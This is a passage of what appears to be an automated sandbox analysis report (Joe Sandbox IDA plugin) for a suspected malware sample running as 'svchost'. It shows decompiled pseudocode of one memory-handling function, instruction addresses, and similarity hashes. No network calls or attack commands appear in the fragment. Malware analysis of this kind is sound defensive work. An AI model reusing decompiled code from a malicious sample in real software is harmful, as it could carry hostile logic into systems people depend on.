                                                                                                                                                                                                                                                                      									if((_a4 & 0x0000ffff) != 2) {
                                                                                                                                                                                                                                                                      										if((_a4 & 0x0000ffff) != 3) {
                                                                                                                                                                                                                                                                      											if((_a4 & 0x0000ffff) == 4) {
                                                                                                                                                                                                                                                                      												_v40 = 0xfa6d44;
                                                                                                                                                                                                                                                                      												_v36 = 0xf4240;
                                                                                                                                                                                                                                                                      												_v32 = 0x7fbee8;
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                                                                                      											_v40 = 0xfa6d48;
                                                                                                                                                                                                                                                                      											_v36 = 0xf4240;
                                                                                                                                                                                                                                                                      											_v32 = 0xbcc7e8;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                                                      										_v40 = 0xfa6d40;
                                                                                                                                                                                                                                                                      										_v36 = 0xf4240;
                                                                                                                                                                                                                                                                      										_v32 = 0x42b5e8;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									if( *_v40 < _v36) {
                                                                                                                                                                                                                                                                      										 *((intOrPtr*)(_v32 +  *_v40 * 4)) = _v16;
                                                                                                                                                                                                                                                                      										_v8 =  *_v40;
                                                                                                                                                                                                                                                                      										 *_v40 =  *_v40 + 1;
                                                                                                                                                                                                                                                                      										_v21 = 1;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									E0401E480( &_v28);
                                                                                                                                                                                                                                                                      									_t181 = _t178 + 4;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								if((_v21 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                      									if( *_v16 != 0) {
                                                                                                                                                                                                                                                                      										_v56 =  *_v16;
                                                                                                                                                                                                                                                                      										E04020CC0(_v56);
                                                                                                                                                                                                                                                                      										_t178 = _t178 + 4;
                                                                                                                                                                                                                                                                      										 *_v16 = 0x666;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									if((_a4 & 0x0000ffff) != 4 &&  *((intOrPtr*)(_v16 + 4)) != 0) {
                                                                                                                                                                                                                                                                      										_v60 =  *((intOrPtr*)(_v16 + 4));
                                                                                                                                                                                                                                                                      										E04020CC0(_v60);
                                                                                                                                                                                                                                                                      										_t178 = _t178 + 4;
                                                                                                                                                                                                                                                                      										 *((intOrPtr*)(_v16 + 4)) = 0x666;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									if(_v16 != 0) {
                                                                                                                                                                                                                                                                      										_v64 = _v16;
                                                                                                                                                                                                                                                                      										E04020CC0(_v64);
                                                                                                                                                                                                                                                                      										_t178 = _t178 + 4;
                                                                                                                                                                                                                                                                      										_v16 = 0x666;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								if(0 != 0) {
                                                                                                                                                                                                                                                                      									continue;
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									break;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_v20 =  *0x4250e4(_a12);
                                                                                                                                                                                                                                                                      							if(_v20 < 1 || _v20 > 0x64) {
                                                                                                                                                                                                                                                                      								break;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								goto L16;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return _v8;
                                                                                                                                                                                                                                                                      			}
























                                                                                                                                                                                                                                                                      0x0401c2a0
                                                                                                                                                                                                                                                                      0x0401c2a6
                                                                                                                                                                                                                                                                      0x0401c2ad
                                                                                                                                                                                                                                                                      0x0401c2da
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0401c2e7
                                                                                                                                                                                                                                                                      0x0401c2f1
                                                                                                                                                                                                                                                                      0x0401c2f8
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0401c305
                                                                                                                                                                                                                                                                      0x0401c305
                                                                                                                                                                                                                                                                      0x0401c313
                                                                                                                                                                                                                                                                      0x0401c333
                                                                                                                                                                                                                                                                      0x0401c333
                                                                                                                                                                                                                                                                      0x0401c341
                                                                                                                                                                                                                                                                      0x0401c347
                                                                                                                                                                                                                                                                      0x0401c352
                                                                                                                                                                                                                                                                      0x0401c361
                                                                                                                                                                                                                                                                      0x0401c36c
                                                                                                                                                                                                                                                                      0x0401c371
                                                                                                                                                                                                                                                                      0x0401c374
                                                                                                                                                                                                                                                                      0x0401c37d
                                                                                                                                                                                                                                                                      0x0401c390
                                                                                                                                                                                                                                                                      0x0401c39c
                                                                                                                                                                                                                                                                      0x0401c3b2
                                                                                                                                                                                                                                                                      0x0401c3b7
                                                                                                                                                                                                                                                                      0x0401c3ba
                                                                                                                                                                                                                                                                      0x0401c3c3
                                                                                                                                                                                                                                                                      0x0401c3d8
                                                                                                                                                                                                                                                                      0x0401c39e
                                                                                                                                                                                                                                                                      0x0401c3a6
                                                                                                                                                                                                                                                                      0x0401c3a6
                                                                                                                                                                                                                                                                      0x0401c3e2
                                                                                                                                                                                                                                                                      0x0401c3f3
                                                                                                                                                                                                                                                                      0x0401c3f7
                                                                                                                                                                                                                                                                      0x0401c3fc
                                                                                                                                                                                                                                                                      0x0401c401
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0401c407
                                                                                                                                                                                                                                                                      0x0401c40e
                                                                                                                                                                                                                                                                      0x0401c415
                                                                                                                                                                                                                                                                      0x0401c423
                                                                                                                                                                                                                                                                      0x0401c443
                                                                                                                                                                                                                                                                      0x0401c463
                                                                                                                                                                                                                                                                      0x0401c465
                                                                                                                                                                                                                                                                      0x0401c46c
                                                                                                                                                                                                                                                                      0x0401c473
                                                                                                                                                                                                                                                                      0x0401c473
                                                                                                                                                                                                                                                                      0x0401c445
                                                                                                                                                                                                                                                                      0x0401c445
                                                                                                                                                                                                                                                                      0x0401c44c
                                                                                                                                                                                                                                                                      0x0401c453
                                                                                                                                                                                                                                                                      0x0401c453
                                                                                                                                                                                                                                                                      0x0401c425
                                                                                                                                                                                                                                                                      0x0401c425
                                                                                                                                                                                                                                                                      0x0401c42c
                                                                                                                                                                                                                                                                      0x0401c433
                                                                                                                                                                                                                                                                      0x0401c433
                                                                                                                                                                                                                                                                      0x0401c482
                                                                                                                                                                                                                                                                      0x0401c494
                                                                                                                                                                                                                                                                      0x0401c49c
                                                                                                                                                                                                                                                                      0x0401c4aa
                                                                                                                                                                                                                                                                      0x0401c4ac
                                                                                                                                                                                                                                                                      0x0401c4ac
                                                                                                                                                                                                                                                                      0x0401c3eb
                                                                                                                                                                                                                                                                      0x0401c3f0
                                                                                                                                                                                                                                                                      0x0401c3f0
                                                                                                                                                                                                                                                                      0x0401c4bb
                                                                                                                                                                                                                                                                      0x0401c4c3
                                                                                                                                                                                                                                                                      0x0401c4ca
                                                                                                                                                                                                                                                                      0x0401c4d1
                                                                                                                                                                                                                                                                      0x0401c4d6
                                                                                                                                                                                                                                                                      0x0401c4dc
                                                                                                                                                                                                                                                                      0x0401c4dc
                                                                                                                                                                                                                                                                      0x0401c4e9
                                                                                                                                                                                                                                                                      0x0401c4fa
                                                                                                                                                                                                                                                                      0x0401c501
                                                                                                                                                                                                                                                                      0x0401c506
                                                                                                                                                                                                                                                                      0x0401c50c
                                                                                                                                                                                                                                                                      0x0401c50c
                                                                                                                                                                                                                                                                      0x0401c517
                                                                                                                                                                                                                                                                      0x0401c51c
                                                                                                                                                                                                                                                                      0x0401c523
                                                                                                                                                                                                                                                                      0x0401c528
                                                                                                                                                                                                                                                                      0x0401c52b
                                                                                                                                                                                                                                                                      0x0401c52b
                                                                                                                                                                                                                                                                      0x0401c517
                                                                                                                                                                                                                                                                      0x0401c534
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0401c534
                                                                                                                                                                                                                                                                      0x0401c31f
                                                                                                                                                                                                                                                                      0x0401c326
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0401c326
                                                                                                                                                                                                                                                                      0x0401c2f8
                                                                                                                                                                                                                                                                      0x0401c2da
                                                                                                                                                                                                                                                                      0x0401c540

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                                                                      • String ID: d$d
                                                                                                                                                                                                                                                                      • API String ID: 2102423945-195624457
                                                                                                                                                                                                                                                                      • Opcode ID: 9623b1273be0775a15697b469d724f7f2ac93ca0881c6a5774c0b2da6d5538b3
                                                                                                                                                                                                                                                                      • Instruction ID: 6121a1327febe31ce23874249aa6888692dbc835ca9b57b63cb1d65f5ac047f3
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9623b1273be0775a15697b469d724f7f2ac93ca0881c6a5774c0b2da6d5538b3
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C79138B4E44218EBEB14DF94D484AEEB7B1FF49308F108559E816BB360D375EA81CB91
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _memset_strlen
                                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                                      • API String ID: 2279092321-2766056989
                                                                                                                                                                                                                                                                      • Opcode ID: 465e3f5f656527acc1b894b08e49c7e6ede76f44b8deec7e1eed15ce09421514
                                                                                                                                                                                                                                                                      • Instruction ID: 9095bb450417fa4dd51ea0b819b640531f396c38f351a606dd718691427917c8
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 465e3f5f656527acc1b894b08e49c7e6ede76f44b8deec7e1eed15ce09421514
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B1142B5E00208FFDB10DFE4DD45BEE77B4AB48314F508254E61477280E635BA458B65
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%